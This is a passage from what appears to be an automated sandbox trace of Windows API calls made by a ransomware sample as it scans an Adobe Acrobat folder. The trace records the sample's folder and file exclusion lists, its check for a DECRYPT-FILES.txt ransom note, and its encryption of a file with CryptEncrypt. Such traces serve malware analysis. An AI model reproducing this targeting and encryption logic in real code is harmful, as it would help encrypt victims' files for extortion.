hFindFile=0x4799b8 | out: hFindFile=0x4799b8) returned 1 [0179.807] CloseHandle (hObject=0x27c) returned 1 [0179.807] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec7c9cd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xa9fbbce0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9fbbce0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="JavaScripts", cAlternateFileName="JAVASC~1")) returned 1 [0179.807] lstrcmpW (lpString1="JavaScripts", lpString2=".") returned 1 [0179.807] lstrcmpW (lpString1="JavaScripts", lpString2="..") returned 1 [0179.807] lstrcatW (in: lpString1="JavaScripts", lpString2="\\" | out: lpString1="JavaScripts\\") returned="JavaScripts\\" [0179.807] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpString2="JavaScripts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\" [0179.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpSrch="\\Program Files") returned 0x0 [0179.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpSrch=":\\Windows") returned 0x0 [0179.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpSrch="\\Games\\") returned 0x0 [0179.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpSrch="\\All Users") returned 0x0 [0179.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpSrch="AhnLab") returned 0x0 [0179.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.808] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\") returned 77 [0179.808] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.808] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\\\0a16c9.tmp") returned 88 [0179.808] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x27c [0179.812] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\") returned 77 [0179.812] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.812] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\\\DECRYPT-FILES.txt") returned 95 [0179.812] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.812] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\") returned 77 [0179.812] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*" [0179.812] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*", lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec7c9cd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xee4c1480, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee4c1480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799b8 [0179.812] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.812] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec7c9cd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xee4c1480, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee4c1480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.812] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.812] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.812] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xee4c1480, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xee4c1480, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee4c1480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0179.812] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0179.812] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0179.812] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0179.812] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0179.812] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0179.812] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0179.812] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0179.812] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0179.812] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0179.812] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0179.812] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.812] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0179.812] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0179.812] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0179.812] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0179.812] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\") returned 77 [0179.812] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.813] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\" [0179.813] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\0a16c9.tmp" [0179.813] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.813] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.813] CloseHandle (hObject=0x0) returned 0 [0179.813] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.813] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9f6fa20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9f6fa20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f6fa20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.813] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.813] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec7c9cd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec7c9cd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xedc00b50, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="glob.js", cAlternateFileName="")) returned 1 [0179.813] lstrcmpiW (lpString1="glob.js", lpString2="DECRYPT-FILES.txt") returned 1 [0179.813] lstrcmpiW (lpString1="glob.js", lpString2="autorun.inf") returned 1 [0179.813] lstrcmpiW (lpString1="glob.js", lpString2="boot.ini") returned 1 [0179.813] lstrcmpiW (lpString1="glob.js", lpString2="desktop.ini") returned 1 [0179.813] lstrcmpiW (lpString1="glob.js", lpString2="ntuser.dat") returned -1 [0179.813] lstrcmpiW (lpString1="glob.js", lpString2="iconcache.db") returned -1 [0179.813] lstrcmpiW (lpString1="glob.js", lpString2="bootsect.bak") returned 1 [0179.813] lstrcmpiW (lpString1="glob.js", lpString2="ntuser.dat.log") returned -1 [0179.814] lstrcmpiW (lpString1="glob.js", lpString2="thumbs.db") returned -1 [0179.814] lstrcmpiW (lpString1="glob.js", lpString2="Bootfont.bin") returned 1 [0179.814] lstrlenW (lpString="glob.js") returned 7 [0179.814] lstrcmpiW (lpString1="js", lpString2="lnk") returned -1 [0179.814] lstrcmpiW (lpString1="js", lpString2="exe") returned 1 [0179.814] lstrcmpiW (lpString1="js", lpString2="sys") returned -1 [0179.814] lstrcmpiW (lpString1="js", lpString2="dll") returned 1 [0179.814] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\") returned 77 [0179.814] lstrlenW (lpString="glob.js") returned 7 [0179.814] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\" [0179.814] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpString2="glob.js" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js" [0179.814] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.814] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0179.815] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=0) returned 1 [0179.815] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 [0179.815] CloseHandle (hObject=0x0) returned 0 [0179.815] CloseHandle (hObject=0x284) returned 1 [0179.815] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.815] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec7c9cd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec7c9cd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xa9f95b80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x112, dwReserved0=0x0, dwReserved1=0x0, cFileName="glob.settings.js.9iJazm", cAlternateFileName="GLOBSE~1.9IJ")) returned 1 [0179.815] lstrcmpiW (lpString1="glob.settings.js.9iJazm", lpString2="DECRYPT-FILES.txt") returned 1 [0179.815] lstrcmpiW (lpString1="glob.settings.js.9iJazm", lpString2="autorun.inf") returned 1 [0179.815] lstrcmpiW (lpString1="glob.settings.js.9iJazm", lpString2="boot.ini") returned 1 [0179.815] lstrcmpiW (lpString1="glob.settings.js.9iJazm", lpString2="desktop.ini") returned 1 [0179.815] lstrcmpiW (lpString1="glob.settings.js.9iJazm", lpString2="ntuser.dat") returned -1 [0179.815] lstrcmpiW (lpString1="glob.settings.js.9iJazm", lpString2="iconcache.db") returned -1 [0179.815] lstrcmpiW (lpString1="glob.settings.js.9iJazm", lpString2="bootsect.bak") returned 1 [0179.815] lstrcmpiW (lpString1="glob.settings.js.9iJazm", lpString2="ntuser.dat.log") returned -1 [0179.815] lstrcmpiW (lpString1="glob.settings.js.9iJazm", lpString2="thumbs.db") returned -1 [0179.815] lstrcmpiW (lpString1="glob.settings.js.9iJazm", lpString2="Bootfont.bin") returned 1 [0179.815] lstrlenW (lpString="glob.settings.js.9iJazm") returned 23 [0179.815] lstrcmpiW (lpString1="9iJazm", lpString2="lnk") returned -1 [0179.815] lstrcmpiW (lpString1="9iJazm", lpString2="exe") returned -1 [0179.815] lstrcmpiW (lpString1="9iJazm", lpString2="sys") returned -1 [0179.815] lstrcmpiW (lpString1="9iJazm", lpString2="dll") returned -1 [0179.815] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\") returned 77 [0179.816] lstrlenW (lpString="glob.settings.js.9iJazm") returned 23 [0179.816] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\" [0179.816] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpString2="glob.settings.js.9iJazm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js.9iJazm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js.9iJazm" [0179.816] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.816] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js.9iJazm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js.9ijazm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0179.816] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=274) returned 1 [0179.816] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0179.816] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0179.817] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0179.817] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0179.817] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0179.817] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x100) returned 1 [0179.818] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0179.819] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.819] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0179.819] CloseHandle (hObject=0x288) returned 1 [0179.819] SetFilePointerEx (in: hFile=0x284, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.819] WriteFile (in: hFile=0x284, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fd7c0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fd7c0*=0x108, lpOverlapped=0x0) returned 1 [0179.820] CloseHandle (hObject=0x0) returned 0 [0179.820] CloseHandle (hObject=0x284) returned 1 [0179.820] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.820] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.821] GetTickCount () returned 0x1134663 [0179.821] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.821] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0179.821] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0179.821] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0179.821] lstrlenA (lpString="kernel32.dll") returned 12 [0179.822] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0179.822] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0179.822] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0179.822] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0179.822] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0179.822] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0179.822] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0179.822] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0179.822] lstrlenA (lpString="ADDATOMA") returned 8 [0179.822] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0179.822] lstrlenA (lpString="ADDATOMW") returned 8 [0179.822] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0179.822] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0179.822] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0179.822] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0179.822] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0179.822] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0179.822] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0179.822] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0179.822] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0179.822] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0179.822] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0179.822] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0179.822] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0179.822] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0179.822] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0179.822] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0179.822] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0179.822] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0179.822] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0179.822] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0179.822] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0179.822] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0179.822] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0179.822] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0179.823] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0179.823] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0179.823] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0179.823] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0179.823] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0179.823] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") 